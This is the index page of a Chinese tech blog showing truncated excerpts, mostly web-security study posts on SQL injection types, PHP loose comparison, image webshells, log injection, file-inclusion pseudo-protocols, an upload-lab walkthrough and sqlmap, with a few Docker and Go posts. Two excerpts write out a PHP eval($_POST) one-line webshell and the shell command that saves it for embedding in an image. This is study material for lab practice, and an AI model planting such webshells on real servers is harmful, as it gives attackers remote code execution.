欢迎来到我的博客 👋

测试 SQL 注入是字符型还是数字型的方法 在 SQL 注入测试中，首先需要判断注入点属于数字型还是字符型（字符串型），因为两者的注入语法和闭合方式完全不同。...

一、PHP弱类型比较（松散比较 ==） 1.1 字符串 → 数字转换 原理：字符串与数字 == 时，字符串提取开头的数字（直到非数字），无数字则为0。 积累清单（直...

Linux 下制作图片马 方法1：cat 命令直接拼接（最简单，通用） # 准备一个包含PHP代码的文本文件 shell.php echo '<?php @eval($_POST["cmd"]);?>' > shell.php # 准备一张正常图片 image.jpg # 拼接：图片在前，...

利用日志注入写入 原理：向日志文件写入PHP代码后，包含该日志文件触发代码执行，代码中再写入Webshell到可访问目录。 Web服务器日志注入...

一、文件包含漏洞可用 PHP 伪协议 汇总表 伪协议 语法格式 核心功能（文件包含场景） 依赖 / 条件 file:// file://绝对路径 file://相对路径 读取本地文件...

第1关 1.创建文件shell.php，写入以下内容： <?php #一句话木马 @eval($_POST['cmd']); #显示php环境信息，便于观察shell.php是否上传成功且被成功执行...

什么是 Sqlmap？ Sqlmap 是一个开源的渗透测试工具，用于自动化检测和利用 SQL 注入漏洞。它支持多种数据库管理系统（DBMS），包括： MySQL PostgreSQL Microsoft SQL Server Oracle SQLite Microsoft...

什么是 Docker？ Docker 是一个开源的容器化平台，可以将应用程序及其依赖项打包到一个轻量级、可移植的容器中。 核心概念： 镜像（Image）：容器的...

Go 并发模型简介 Go 语言从设计之初就将并发作为核心特性，其并发模型基于 CSP（Communicating Sequential Processes） 理论。 Go 的并发哲学...

欢迎来到我的博客 你好！这是我博客的第一篇文章。在这里，我将分享： 💻 技术文章：编程技巧、框架使用、架构设计 🛠️ 工具推荐：提升效率的开发工具 📚 读...